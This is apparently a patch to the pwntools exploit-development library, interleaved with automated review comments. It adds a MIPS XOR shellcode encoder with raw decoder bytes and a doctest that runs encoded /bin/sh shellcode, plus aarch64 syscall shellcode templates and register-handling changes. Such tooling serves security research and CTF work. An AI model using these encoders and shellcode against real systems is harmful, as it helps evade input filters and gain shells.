+++ b/pwnlib/encoders/mips/xor.py
@@ -0,0 +1,135 @@ +#!/usr/bin/env python2 +# Source: +# https://github.com/zcutlip/bowcaster/blob/master/src/bowcaster/encoders/mips.py +# +# Copyright (c) 2013 Zachary Cutlip , +# 2013 Tactical Network Solutions, LLC +# +# +# Permission is hereby granted, free of charge, to any person obtaining a copy of +# this software and associated documentation files (the "Software"), to deal in +# the Software without restriction, including without limitation the rights to +# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies +# of the Software, and to permit persons to whom the Software is furnished to do +# so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +from ...asm import asm +from ... 
import shellcraft +from ...context import context +from ...util.fiddling import xor_key +from ..encoder import Encoder + +decoders = { + 'little': ''.join([ + "SIZ2SIZ1\x0e\x24", # li t6,-5 + "\x27\x70\xc0\x01", # nor t6,t6,zero + "\xa3\xff\x0b\x24", # li t3,-93 + "\x26\x40\xce\x01", # xor t0,t6,t6 + "\xff\xff\x08\x21", # addi t0,t0,-1 + "\xff\xff\x10\x05", # bltzal t0,14 + "\x82\x82\x08\x28", # slti t0,zero,-32126 + "\xe2\xff\xfd\x23", # addi sp,ra,-30 + "\x27\x58\x60\x01", # nor t3,t3,zero + "\x21\xc8\xeb\x03", # addu t9,ra,t3 + "\x82\x82\x17\x28", # slti s7,zero,-32126 + "\xfc\xff\x31\x8f", # lw s1,-4(t9) + "\xfb\xff\x0c\x24", # li t4,-5 + "\x27\x60\x80\x01", # nor t4,t4,zero + "\xfd\xff\x8f\x21", # addi t7,t4,-3 + "\xfc\xff\x28\x8f", # lw t0,-4(t9) + "\x21\xb8\xef\x02", # addu s7,s7,t7 + "\x26\x18\x11\x01", # xor v1,t0,s1 + "\x2b\xf0\xee\x02", # sltu s8,s7,t6 + "\xfc\xff\x23\xaf", # sw v1,-4(t9) + "\xfa\xff\x1e\x14", # bne zero,s8,3c + "\x21\xc8\x2c\x03", # addu t9,t9,t4 + "\xfd\xff\x86\x21", # addi a2,t4,-3 + "\xf8\xff\xa6\xaf", # sw a2,-8(sp) + "\x26\x28\xce\x01", # xor a1,t6,t6 + "\xfc\xff\xa5\xaf", # sw a1,-4(sp) + "\xf8\xff\xa4\x27", # addiu a0,sp,-8 + "\x46\x10\x02\x24", # li v0,4166 + "\x0c\x54\x4a\x01" # syscall 0x52950 + ]), + 'big': ''.join([ + "\x24\x0eSIZ1SIZ2", # li t6,-5 + "\x01\xc0\x70\x27", # nor t6,t6,zero + "\x24\x0b\xff\xa3", # li t3,-93 + "\x01\xce\x40\x26", # xor t0,t6,t6 + "\x21\x08\xff\xff", # addi t0,t0,-1 + "\x05\x10\xff\xff", # bltzal t0,14 + "\x28\x08\x82\x82", # slti t0,zero,-32126 + "\x23\xfd\xff\xe2", # addi sp,ra,-30 + "\x01\x60\x58\x27", # nor t3,t3,zero + "\x03\xeb\xc8\x21", # addu t9,ra,t3 + "\x28\x17\x82\x82", # slti s7,zero,-32126 + "\x8f\x31\xff\xfc", # lw s1,-4(t9) + "\x24\x0c\xff\xfb", # li t4,-5 + "\x01\x80\x60\x27", # nor t4,t4,zero + "\x21\x8f\xff\xfd", # addi t7,t4,-3 + "\x8f\x28\xff\xfc", # lw t0,-4(t9) + "\x02\xef\xb8\x21", # addu s7,s7,t7 + "\x01\x11\x18\x26", # xor v1,t0,s1 + "\x02\xee\xf0\x2b", # sltu s8,s7,t6 + 
"\xaf\x23\xff\xfc", # sw v1,-4(t9) + "\x14\x1e\xff\xfa", # bne zero,s8,3c + "\x03\x2c\xc8\x21", # addu t9,t9,t4 + "\x21\x86\xff\xfd", # addi a2,t4,-3 + "\xaf\xa6\xff\xf8", # sw a2,-8(sp) + "\x01\xce\x28\x26", # xor a1,t6,t6 + "\xaf\xa5\xff\xfc", # sw a1,-4(sp) + "\x27\xa4\xff\xf8", # addiu a0,sp,-8 + "\x24\x02\x10\x46", # li v0,4166 + "\x01\x4a\x54\x0c" # syscall 0x52950 + ]) +} + + + +class MipsXorEncoder(Encoder): + r"""Generates an XOR decoder for MIPS. + + >>> context.clear(arch='mips') + >>> shellcode = asm(shellcraft.sh()) + >>> avoid = '/bin/sh\x00' + >>> encoded = pwnlib.encoders.mips.xor.encode(shellcode, avoid) + >>> assert not any(c in encoded for c in avoid) + >>> p = run_shellcode(encoded) + >>> p.sendline('echo hello; exit') + >>> p.recvline() + 'hello\n' + """ + + blacklist = cannot_avoid = set(''.join(v for v in decoders.values())) + + def __call__(self, raw_bytes, avoid, pcreg=''): + + assert 0 == len(raw_bytes) % context.bytes, "Payload is not aligned" + + size = (len(raw_bytes)/4) + 1 + assert size < 0x10000, "Payload is too long" + + size = size ^ 0xffff + sizelo = size & 0xff + sizehi = size >> 8 + + decoder = str(decoders[context.endian]) + decoder = decoder.replace('SIZ1', chr(sizehi)) + decoder = decoder.replace('SIZ2', chr(sizelo)) + + key, data = xor_key(raw_bytes, avoid=avoid) + + return decoder + key + data + +encode = MipsXorEncoder() diff --git a/pwnlib/gdb.py b/pwnlib/gdb.py index 3ec4d8a7f..3d7de24e9 100644 --- a/pwnlib/gdb.py +++ b/pwnlib/gdb.py @@ -7,7 +7,7 @@ from . import atexit from . import elf from . import tubes -from .asm import make_elf, _bfdname +from .asm import make_elf, make_elf_from_assembly, _bfdname from .context import context, LocalContext from .log import getLogger from .util import misc 
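Review bot: `blacklist = cannot_avoid = set(''.join(v for v in decoders.values()))` is built from the raw templates, so it contains the placeholder characters `S`, `I`, `Z`, `1` and `2` that never reach the output, while the two bytes that actually replace them, `chr(sizehi)` and `chr(sizelo)`, are never compared against `avoid`. Strip the placeholders when computing the blacklist, e.g. `set(''.join(decoders.values()).replace('SIZ1', '').replace('SIZ2', ''))`, and after substitution check `if set(chr(sizehi) + chr(sizelo)) & set(avoid): raise ValueError('payload length %d yields a forbidden size byte' % len(raw_bytes))`. Both `assert` statements are input validation and vanish under `python -O`; turn them into explicit `raise ValueError(...)`. `size = (len(raw_bytes)/4) + 1` hard-codes the word size that the line above spelled as `context.bytes`; the decoder's `lw`/`sw` loop is word-based, so say `4` (or `context.bytes`) in both places rather than one of each. Whether `xor_key` guarantees the 4-byte `key` it returns is itself free of `avoid` bytes is not visible here, and it is emitted verbatim, so that is worth confirming.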
@@ -17,7 +17,21 @@ log = getLogger(__name__) @LocalContext -def debug_shellcode(data, execute=None): +def debug_assembly(asm, execute=None, vma=None): + """ + Creates an ELF file, and launches it with GDB. + + This is identical to debug_shellcode, except that + any defined symbols are available in GDB, and it + saves you the explicit call to asm(). + """ + tmp_elf = make_elf_from_assembly(asm, vma=vma, extract=False) + os.chmod(tmp_elf, 0777) + atexit.register(lambda: os.unlink(tmp_elf)) + return debug(tmp_elf, execute=None, arch=context.arch) + +@LocalContext +def debug_shellcode(data, execute=None, vma=None): """ Creates an ELF file, and launches it with GDB. @@ -28,11 +42,9 @@ def debug_shellcode(data, execute=None): Returns: A ``process`` tube connected to the shellcode on stdin/stdout/stderr. """ - tmp_elf = tempfile.mktemp(prefix='pwn', suffix='.elf') - elf_data = make_elf(data) - with open(tmp_elf,'wb+') as f: - f.write(elf_data) - f.flush() + if isinstance(data, unicode): + log.error("Shellcode is cannot be unicode. Did you mean debug_assembly?") + tmp_elf = make_elf(data, extract=False, vma=vma) os.chmod(tmp_elf, 0777) atexit.register(lambda: os.unlink(tmp_elf)) return debug(tmp_elf, execute=None, arch=context.arch) diff --git a/pwnlib/lexer.py b/pwnlib/lexer.py index 57c52f9de..0fd2961e0 100644 --- a/pwnlib/lexer.py +++ b/pwnlib/lexer.py @@ -81,7 +81,8 @@ class PwntoolsLexer(RegexLexer): 'whitespace': [ (r'\n', Text), (r'\s+', Text), - (r'/\*.*?\*/', Comment) + (r'/\*.*?\*/', Comment), + (r';.*$', Comment) ], 'punctuation': [ (r'[-*,.():]+', Punctuation) diff --git a/pwnlib/regsort.py b/pwnlib/regsort.py index 7b37e5e91..af4e21da9 100644 --- a/pwnlib/regsort.py +++ b/pwnlib/regsort.py @@ -2,8 +2,10 @@ """ Topographical sort """ +from random import shuffle, randint from collections import OrderedDict, defaultdict +from .context import context from .log import getLogger log = getLogger(__name__) 
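Review bot: `debug_assembly` accepts `execute` but then calls `debug(tmp_elf, execute=None, arch=context.arch)`, so any GDB script the caller passes is silently dropped; it should be `return debug(tmp_elf, execute=execute, arch=context.arch)` (the existing `debug_shellcode` return line has the same shape and the same problem). `os.chmod(tmp_elf, 0777)` makes the ELF that GDB is about to run world-writable in a shared temp directory, which lets another local user swap its contents before it is executed; `0755` or `0700` is all that is needed, and since the unlink is only registered via `atexit` the writable binary lingers for the whole session. The docstring should also say that `vma` is forwarded to `make_elf_from_assembly` and that `execute` is a GDB script, as for `debug`.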
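Review bot: The new error text reads `Shellcode is cannot be unicode.`; make it `log.error("Shellcode cannot be unicode. Did you mean debug_assembly?")`. While here, the unchanged return line `return debug(tmp_elf, execute=None, arch=context.arch)` still discards the function's own `execute` argument, so the new `vma` parameter gets threaded through but `execute` does not; `execute=execute` fixes it. The change from writing `make_elf(data)` bytes to using `make_elf(data, extract=False, vma=vma)` as a path presumably reflects a contract change in `asm.py`, which is outside this hunk.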
@@ -103,7 +105,7 @@ def depends_on_cycle(reg, assignments, in_cycles): reg = assignments.get(reg, None) return False -def regsort(in_out, all_regs, tmp = None, xchg = True): +def regsort(in_out, all_regs, tmp = None, xchg = True, randomize = None): """ Sorts register dependencies. @@ -150,6 +152,8 @@ def regsort(in_out, all_regs, tmp = None, xchg = True): Indicates the existence of an instruction which can swap the contents of two registers without use of a third register. If ``bool(xchg)==False``, this mode is disabled. + random(bool): + Randomize as much as possible about the order or registers. Returns: @@ -219,6 +223,9 @@ def regsort(in_out, all_regs, tmp = None, xchg = True): ('mov', 'c', 'x'), ('mov', 'x', '1')] """ + if randomize is None: + randomize = context.randomize + sentinel = object() # Drop all registers which will be set to themselves. @@ -252,6 +259,9 @@ def regsort(in_out, all_regs, tmp = None, xchg = True): if not any(v in in_out for k,v in in_out.items()): result = [('mov', k,in_out[k]) for k in sorted(in_out)] + if randomize: + shuffle(result) + for dreg, sreg in sorted(post_mov.items()): result.append(('mov', dreg, sreg)) @@ -265,9 +275,6 @@ def regsort(in_out, all_regs, tmp = None, xchg = True): # In this case, both A and C must be set before B. deps = {r: extract_dependencies(r, in_out) for r in in_out} - # Order alphabetically for repeatability - not_done = OrderedDict(in_out) - # Final result which will be returned result = [] @@ -280,11 +287,19 @@ def regsort(in_out, all_regs, tmp = None, xchg = True): in_cycle = [] not_in_cycle = [] + if randomize: + shuffle(cycle_candidates) + while cycle_candidates: reg = cycle_candidates[0] cycle = check_cycle(reg, in_out) if cycle: + if randomize: + x = randint(0, len(cycle)) + cycle = cycle[x:] + cycle[:x] + + cycles.append(cycle) in_cycle.extend(cycle) for reg in cycle: 
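Review bot: The docstring entry is named `random(bool)` but the parameter added to the signature is `randomize`, so the rendered docs will not match the API; change the line to `randomize(bool):` and state the default: `Defaults to ``context.randomize`` when ``None``.`. The sentence `Randomize as much as possible about the order or registers.` should read `order of registers`. `regsort`'s body continues outside this hunk.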
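Review bot: `x = randint(0, len(cycle))` is inclusive on both ends, so `x == len(cycle)` yields `cycle[len:] + cycle[:len]`, i.e. no rotation, and that identity outcome is therefore drawn twice as often as any other; `x = randrange(len(cycle))` (or `randint(0, len(cycle) - 1)`) gives every starting register equal weight, with `randrange` added to the `from random import shuffle, randint` line. Rotating a cycle keeps it a valid cycle, so the only observable effect is which register ends up as `cycle[0]`/`cycle[-1]` in the later tmp/xchg code. The surrounding `while cycle_candidates:` loop continues past the end of this hunk.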
@@ -331,6 +346,9 @@ def regsort(in_out, all_regs, tmp = None, xchg = True): not_in_cycle.remove(tmp) # Resolve everything *not* in a cycle. + if randomize: + shuffle(not_in_cycle) + while not_in_cycle: reg = not_in_cycle[0] order = resolve_order(reg, deps) @@ -363,8 +381,12 @@ def regsort(in_out, all_regs, tmp = None, xchg = True): # # ╭─ (A) → (B) → (C) ─╮ # ╰──────── ← ────────╯ + if randomize: + shuffle(cycles) + if tmp: for cycle in cycles: + first = cycle[0] last = cycle[-1] diff --git a/pwnlib/rop/srop.py b/pwnlib/rop/srop.py index 6540472ae..5eebb5dde 100644 --- a/pwnlib/rop/srop.py +++ b/pwnlib/rop/srop.py @@ -110,14 +110,14 @@ >>> context.clear() >>> context.arch = "mips" >>> context.endian = "big" - >>> assembly = 'read:' + shellcraft.read(constants.STDIN_FILENO, 'sp', 1024) + >>> assembly = 'read:' + shellcraft.read(constants.STDIN_FILENO, '$sp', 1024) >>> assembly += 'sigreturn:' + shellcraft.sigreturn() >>> assembly += 'syscall: ' + shellcraft.syscall() - >>> assembly += 'exit: ' + 'xor $a0, $a0, $a0; li $v0, 0xfa1; syscall;' + >>> assembly += 'exit: ' + shellcraft.exit(0) >>> assembly += 'message: ' + ('.asciz "%s"' % message) >>> binary = ELF.from_assembly(assembly) >>> frame = SigreturnFrame() - >>> frame.v0 = 0xfa4 + >>> frame.v0 = constants.SYS_write >>> frame.a0 = constants.STDOUT_FILENO >>> frame.a1 = binary.symbols['message'] >>> frame.a2 = len(message) 
@@ -136,14 +136,14 @@
>>> context.clear()
>>> context.arch = "mips"
>>> context.endian = "little"
- >>> assembly = 'read:' + shellcraft.read(constants.STDIN_FILENO, 'sp', 1024)
+ >>> assembly = 'read:' + shellcraft.read(constants.STDIN_FILENO, '$sp', 1024)
>>> assembly += 'sigreturn:' + shellcraft.sigreturn()
>>> assembly += 'syscall: ' + shellcraft.syscall()
- >>> assembly += 'exit: ' + 'xor $a0, $a0, $a0; li $v0, 0xfa1; syscall;'
+ >>> assembly += 'exit: ' + shellcraft.exit(0)
>>> assembly += 'message: ' + ('.asciz "%s"' % message)
>>> binary = ELF.from_assembly(assembly)
>>> frame = SigreturnFrame()
- >>> frame.v0 = 0xfa4
+ >>> frame.v0 = constants.SYS_write
>>> frame.a0 = constants.STDOUT_FILENO
>>> frame.a1 = binary.symbols['message']
>>> frame.a2 = len(message)
diff --git a/pwnlib/shellcraft/__init__.py b/pwnlib/shellcraft/__init__.py
index 560e3f313..58e8161fc 100644
--- a/pwnlib/shellcraft/__init__.py
+++ b/pwnlib/shellcraft/__init__.py
@@ -5,6 +5,7 @@
from . import internal
from .. import constants
+from ..util import packing
from ..context import context
@@ -32,6 +33,10 @@ def __init__(self, name, directory):
# Insert into the module list
sys.modules[self.__name__] = self
+ def _get_source(self, template):
+ assert template in self.templates
+ return os.path.join(self._absdir, *template.split('.')) + '.asm'
+
def __lazyinit__(self):
# Create a dictionary of submodules
@@ -122,6 +127,24 @@ def eval(self, item):
return item
return constants.eval(item)
+ def pretty(self, n, comment=True):
+ if isinstance(n, str):
+ return repr(n)
+ if not isinstance(n, int):
+ return n
+ if isinstance(n, constants.Constant):
+ if comment: return '%s /* %s */' % (n,self.pretty(int(n)))
+ else: return '%s (%s)' % (n,self.pretty(int(n)))
+ elif abs(n) < 10:
+ return str(n)
+ else:
+ return hex(n)
+
+ def okay(self, s, *a, **kw):
+ if isinstance(s, int):
+ s = packing.pack(s, *a, **kw)
+ return '\0' not in s and '\n' not in s
+
import registers # To prevent garbage collection
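Review bot: `_get_source` validates its argument with `assert template in self.templates`, which is stripped under `python -O` and otherwise surfaces as a bare AssertionError that does not name the template; that membership test is also what keeps a dotted name from contributing path components that leave `_absdir` once it is split and joined, so it should not depend on assert. `if template not in self.templates: raise KeyError(template)` keeps the check in optimized runs and tells the caller what was missing. The method has no docstring; a one-liner stating that it maps a dotted template name to the absolute `.asm` path under `_absdir` would do. The enclosing class starts before this hunk.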
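Review bot: In `pretty`, the `isinstance(n, constants.Constant)` branch comes after the `if not isinstance(n, int): return n` guard, so it is only reachable when Constant subclasses int; if Constant derives from long (this patch is Python 2 code, see `exec T in locals()` in internal.py), every Constant is returned unchanged and the `/* value */` comment is never produced. Test the Constant case before the int guard, or widen the guard to `(int, long)`, whichever matches Constant's actual base. Neither new method is documented: `pretty` should say it returns a display form for str and ints (repr, small decimal, or hex, with the numeric value as a comment for Constants) and passes anything else through, and `okay` should say it reports whether the value, packed if it is an int, contains neither NUL nor newline. The enclosing class starts before this hunk.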
diff --git a/pwnlib/shellcraft/internal.py b/pwnlib/shellcraft/internal.py
index 9d80d9ecb..841cf1a86 100644
--- a/pwnlib/shellcraft/internal.py
+++ b/pwnlib/shellcraft/internal.py
@@ -161,10 +161,23 @@ def islabelchar(c):
return %(funcname)s
''' % locals()
- exec T
+ exec T in locals()
# Setting _relpath is a slight hack only used to get better documentation
res = wrap(template, render_global)
res._relpath = path
+ res.__module__ = 'pwnlib.shellcraft.' + os.path.dirname(path).replace('/','.')
+
+ import sys, inspect, functools
+
+ @functools.wraps(res)
+ def function(*a):
+ return sys.modules[res.__module__].function(res.__name__, res, *a)
+ @functools.wraps(res)
+ def call(*a):
+ return sys.modules[res.__module__].call(res.__name__, *a)
+
+ res.function = function
+ res.call = call
return res
diff --git a/pwnlib/shellcraft/registers.py b/pwnlib/shellcraft/registers.py
index 54ba4dedf..1dca7b33e 100644
--- a/pwnlib/shellcraft/registers.py
+++ b/pwnlib/shellcraft/registers.py
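Review bot: `import sys, inspect, functools` brings in `inspect`, which none of the added lines use, and a three-name import in the middle of a function body reads as a leftover; `import sys, functools` (or moving both to the module's import block) covers the code shown. Separately, `exec T in locals()` runs the generated source into a dictionary snapshot rather than the function's real local scope, so in CPython 2 a name that `T` defines is not readable as a plain local afterwards; if `render_global` is produced by `T`, an explicit namespace (`ns = {}; exec T in ns` and then `ns['render_global']`) makes the dependency visible. The enclosing function starts before this hunk, so where `T`'s names are consumed cannot be confirmed from here.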
@@ -3,18 +3,49 @@
from ..context import context
from ..util.misc import register_sizes
-mips = map('r{}'.format, range(32))
-mips += map('v{}'.format, range(2))
-mips += map('a{}'.format, range(4))
-mips += map('t{}'.format, range(8))
-mips += map('s{}'.format, range(9))
-mips += map('t{}'.format, range(8,10))
-mips += map('k{}'.format, range(2))
-mips += ['zero', 'at', 'gp', 'sp', 'ra']
+mips = {
+ '$0' : 0, '$zero': 0,
+ '$1' : 1, '$at': 1,
+ '$2' : 2, '$v0': 2,
+ '$3' : 3, '$v1': 3,
+ '$4' : 4, '$a0': 4,
+ '$5' : 5, '$a1': 5,
+ '$6' : 6, '$a2': 6,
+ '$7' : 7, '$a3': 7,
+ '$8' : 8, '$t0': 8,
+ '$9' : 9, '$t1': 9,
+ '$10': 10, '$t2': 10,
+ '$11': 11, '$t3': 11,
+ '$12': 12, '$t4': 12,
+ '$13': 13, '$t5': 13,
+ '$14': 14, '$t6': 14,
+ '$15': 15, '$t7': 15,
+ '$16': 16, '$s0': 16,
+ '$17': 17, '$s1': 17,
+ '$18': 18, '$s2': 18,
+ '$19': 19, '$s3': 19,
+ '$20': 20, '$s4': 20,
+ '$21': 21, '$s5': 21,
+ '$22': 22, '$s6': 22,
+ '$23': 23, '$s7': 23,
+ '$24': 24, '$t8': 24,
+ '$25': 25, '$t9': 25,
+ '$26': 26, '$k0': 26,
+ '$27': 27, '$k1': 27,
+ '$28': 28, '$gp': 28,
+ '$29': 29, '$sp': 29,
+ '$30': 30, '$s8': 30,
+ '$31': 31, '$ra': 31,
+}
arm = map('r{}'.format, range(13))
arm += ["sp", "lr", "pc", "cpsr"]
+thumb = arm
+
+aarch64 = map('x{}'.format, range(32))
+aarch64 += ["sp", "lr", "pc", "cpsr"]
+
i386_baseregs = [ "ax", "cx", "dx", "bx", "sp", "bp", "si", "di", "ip"]
i386 = map('e{}'.format, i386_baseregs)
@@ -22,8 +53,8 @@
i386 += [ "eflags", "cs", "ss", "ds", "es", "fs", "gs", ]
amd64 = map('r{}'.format, i386_baseregs)
-amd64 += map('r{}'.format, range(10,16))
-amd64 += map('r{}d'.format, range(10,16))
+amd64 += map('r{}'.format, range(8,16))
+amd64 += map('r{}d'.format, range(8,16))
amd64 += i386
powerpc = map('r{}'.format, range(32))
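Review bot: `thumb = arm` binds both names to the same list object, so a later `thumb += [...]` in the style this file uses for every other table would silently extend `arm` as well; `thumb = list(arm)` gives thumb its own copy. The new `aarch64` table also lists `cpsr`, which is an AArch32 register (AArch64 keeps the condition flags in PSTATE/NZCV), and `x31` is not a general-purpose register name since that encoding means sp or xzr depending on the instruction; worth confirming those entries are intended before anything keys on them. A one-line comment above the `mips` dict explaining that it maps both numeric and symbolic names to the register number would help readers, since it is the only table here that is a dict rather than a list.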
@@ -124,6 +155,14 @@ def __init__(self, name, size): if name.startswith('r') or name[1:3].isdigit(): self.is64bit = True + @property + def bits(self): + return self.size + + @property + def bytes(self): + return self.bits / 8 + def fits(self, value): return self.size >= bits_required(value) @@ -142,7 +181,9 @@ def __repr__(self): def get_register(name): if isinstance(name, Register): return name - return intel.get(name, None) + if isinstance(name, str): + return intel.get(name, None) + return None def is_register(obj): if isinstance(obj, Register): diff --git a/pwnlib/shellcraft/templates/aarch64/__doc__ b/pwnlib/shellcraft/templates/aarch64/__doc__ new file mode 100644 index 000000000..e69de29bb diff --git a/pwnlib/shellcraft/templates/aarch64/infloop.asm b/pwnlib/shellcraft/templates/aarch64/infloop.asm new file mode 100644 index 000000000..77aab644a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/infloop.asm @@ -0,0 +1,5 @@ +<% from pwnlib.shellcraft import common %> +<%docstring>An infinite loop. +<% infloop = common.label("infloop") %> +${infloop}: + b ${infloop} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/__doc__ b/pwnlib/shellcraft/templates/aarch64/linux/__doc__ new file mode 100644 index 000000000..e69de29bb diff --git a/pwnlib/shellcraft/templates/aarch64/linux/accept.asm b/pwnlib/shellcraft/templates/aarch64/linux/accept.asm new file mode 100644 index 000000000..595920998 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/accept.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, addr, addr_len"/> +<%docstring> +Invokes the syscall accept. See 'man 2 accept' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_accept', fd, addr, addr_len)} 
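Review bot: `bytes` returns `self.bits / 8`, which is integer division only under Python 2; under `from __future__ import division` or Python 3 it becomes a float such as 4.0, which breaks slicing and packing callers. `return self.bits // 8` is exact on both. Both new properties are undocumented; `bits` should say it is an alias of `size` and `bytes` that it is the register width in whole bytes. The enclosing class starts before this hunk.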
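Review bot: `get_register` now returns None for any non-`str` name, which in a Python 2 module also covers `unicode` names, so a register name that arrived as unicode silently becomes "not a register" instead of being looked up. If that is not intended, `isinstance(name, basestring)` keeps the lookup for both string types. A docstring stating that the function accepts a Register or a register name and returns None for anything else would document the new behaviour.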
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/access.asm b/pwnlib/shellcraft/templates/aarch64/linux/access.asm new file mode 100644 index 000000000..5e4d2db87 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/access.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="name, type"/> +<%docstring> +Invokes the syscall access. See 'man 2 access' for more information. + +Arguments: + name(char): name + type(int): type + + + ${syscall('SYS_access', name, type)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/acct.asm b/pwnlib/shellcraft/templates/aarch64/linux/acct.asm new file mode 100644 index 000000000..0524faba6 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/acct.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall acct. See 'man 2 acct' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_acct', name)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/alarm.asm b/pwnlib/shellcraft/templates/aarch64/linux/alarm.asm new file mode 100644 index 000000000..81a2a7e26 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/alarm.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="seconds"/> +<%docstring> +Invokes the syscall alarm. See 'man 2 alarm' for more information. + +Arguments: + seconds(unsigned): seconds + + + ${syscall('SYS_alarm', seconds)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/bind.asm b/pwnlib/shellcraft/templates/aarch64/linux/bind.asm new file mode 100644 index 000000000..3361b3db2 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/bind.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall bind. See 'man 2 bind' for more information. + +Arguments: + fd(int): fd + addr(CONST_SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_bind', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/brk.asm b/pwnlib/shellcraft/templates/aarch64/linux/brk.asm new file mode 100644 index 000000000..74296208f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/brk.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="addr"/> +<%docstring> +Invokes the syscall brk. See 'man 2 brk' for more information. + +Arguments: + addr(void): addr + + + ${syscall('SYS_brk', addr)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/cat.asm b/pwnlib/shellcraft/templates/aarch64/linux/cat.asm new file mode 100644 index 000000000..3b2f5d0b7 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/cat.asm @@ -0,0 +1,18 @@ +<% + from pwnlib.shellcraft.aarch64 import syscall, pushstr + from pwnlib.shellcraft import common +%> +<%page args="filename, fd=1"/> +<%docstring> +Opens a file and writes its contents to the specified file descriptor. + +Example: + + >>> write('flag', 'This is the flag\n') + >>> run_assembly(shellcraft.cat('flag')).recvline() + 'This is the flag\n' + + + ${pushstr(filename)} + ${syscall('SYS_open', 'sp', 0, 'O_RDONLY')} + ${syscall('SYS_sendfile', fd, 'x0', 0, 0x7fffffff)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/chdir.asm b/pwnlib/shellcraft/templates/aarch64/linux/chdir.asm new file mode 100644 index 000000000..ae942daac --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/chdir.asm 
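Review bot: In cat.asm, `${syscall('SYS_open', 'sp', 0, 'O_RDONLY')}` passes 0 in open(2)'s flags slot and O_RDONLY in the mode slot; it behaves the same only because O_RDONLY is 0, and reads as if the two arguments were swapped, so `${syscall('SYS_open', 'sp', 'O_RDONLY', 0)}` states the intent. This template imports `syscall` from `pwnlib.shellcraft.aarch64` while every sibling template imports it from `pwnlib.shellcraft.aarch64.linux`; pick one. The docstring has no Arguments section for `filename` and `fd`, and since the generic AArch64 syscall table exposes openat rather than open, it is worth confirming that `SYS_open` resolves in the aarch64 constants.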
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chdir. See 'man 2 chdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chdir', path)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/chmod.asm b/pwnlib/shellcraft/templates/aarch64/linux/chmod.asm new file mode 100644 index 000000000..136a0a602 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/chmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall chmod. See 'man 2 chmod' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_chmod', file, mode)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/chown.asm b/pwnlib/shellcraft/templates/aarch64/linux/chown.asm new file mode 100644 index 000000000..f0d4efb37 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/chown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall chown. See 'man 2 chown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_chown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/chroot.asm b/pwnlib/shellcraft/templates/aarch64/linux/chroot.asm new file mode 100644 index 000000000..2ac96621d --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/chroot.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chroot. See 'man 2 chroot' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chroot', path)} 
